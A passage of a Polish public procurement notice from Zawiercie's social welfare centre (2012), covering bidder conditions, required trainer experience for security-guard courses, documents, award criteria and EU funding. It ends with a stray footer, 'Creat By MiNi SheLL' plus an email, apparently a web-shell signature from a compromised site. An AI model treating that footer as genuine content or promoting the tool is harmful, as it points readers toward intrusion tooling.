<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia (SIWZ) - część I - II.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia (SIWZ) - część I - II.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia (SIWZ) - część I - II.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek szczegółowy - w zakresie części nr II - Wykonawcy dysponują lub będą dysponowali zespołem osób, które będą uczestniczyć w wykonywaniu zamówienia -  w tym co najmniej:
1)	1 osobą - trenerem, który musi posiadać doświadczenie w przeprowadzeniu szkoleń - co najmniej 150 godzin z zakresu bloku ogólnoprawnego,
2)	1 osobą - trenerem, który musi posiadać doświadczenie w przeprowadzeniu szkoleń - co najmniej 210 godzin z zakresu bloku ochrony mienia,
3)	1 osobą - trenerem, który musi posiadać doświadczenie w przeprowadzeniu szkoleń - co najmniej 90 godzin z zakresu bloku ochrony osób,
4)	1 osobą - trenerem, który musi posiadać doświadczenie w przeprowadzeniu szkoleń - co najmniej 105 godzin z zakresu wyszkolenia strzeleckiego,
5)	1 osobą - trenerem, który musi posiadać doświadczenie w przeprowadzeniu szkoleń - co najmniej 180 godzin z zakresu bloku samoobrony i technik interwencyjnych.
Ocena spełniania przedstawionego powyżej warunku zostanie dokonana wg formuły: spełnia - nie spełnia.
Złożenie przez Wykonawcę w ofercie dokumentów i oświadczeń:
1)Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (sporządzony według wzoru stanowiącego załącznik nr 3 do specyfikacji), odpowiedzialnych za świadczenie usług, wraz z informacjami na temat ich doświadczenia, niezbędnych dla wykonania zamówienia, zakresu wykonywanych przez nie czynności, wraz z informacją o podstawie do dysponowania tymi osobami.  
2)	Oświadczenia o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji (dotyczy części nr I - II);
Wykonawca może polegać na osobach zdolnych do wykonania zamówienia, innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia

będzie stanowiło podstawę do oceny spełnienia warunków udziału w postępowaniu. Zamawiający sprawdzi z treści tych dokumentów i oświadczeń czy Wykonawca spełnia ww. warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa Oświadczenie o spełnianiu warunków udziału w postępowaniu, sporządzone według wzoru stanowiącego załącznik nr 1 do specyfikacji istotnych warunków zamówienia (SIWZ) - część I - II.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto Wykonawca złoży wraz z ofertą:
1)	Druk Formularz oferty, sporządzony wg wzoru stanowiącego załącznik nr 4 do specyfikacji (dotyczy części nr I - II).
2)	Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym załącznik nr 5 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu) (dotyczy części nr I - II).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany postanowień umów (części I-II) mogą nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności, przy czym zmiany istotnych ich postanowień mogą nastąpić (na warunkach j/w) w następujących przypadkach: 1) nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia, 2) konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w umowach pomiędzy Zamawiającym a inną niż Wykonawca stroną, w tym instytucjami nadzorującymi realizację projektu, w ramach którego realizowane jest zamówienie, 3) konieczność wprowadzenia zmian będzie następstwem zmian wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej, w szczególności w zakresie sprawozdawczości, 4) wynikną rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez strony, 5) przekształcenia podmiotowego Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.mopszawiercie.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Zawierciu, ul. Piłsudskiego 47, Pokój nr 6 - sekretariat, I piętro..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.12.2012 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Zawierciu, ul. Piłsudskiego 47, Pokój nr 6 - sekretariat, I piętro..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Ogłoszenie o zamówieniu zostało zamieszczone w Biuletynie Zamówień Publicznych w dniu 3 grudnia 2012 r. Projekt pn.: Promocja aktywnej integracji społecznej na terenie miasta Zawiercie realizowany przez Miejski Ośrodek Pomocy Społecznej w Zawierciu, współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.1. Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.1. Rozwój i upowszechnianie aktywnej integracji przez ośrodki pomocy społecznej. Zapis określony w III.5) ogłoszenia - zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich - dotyczy części nr I..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com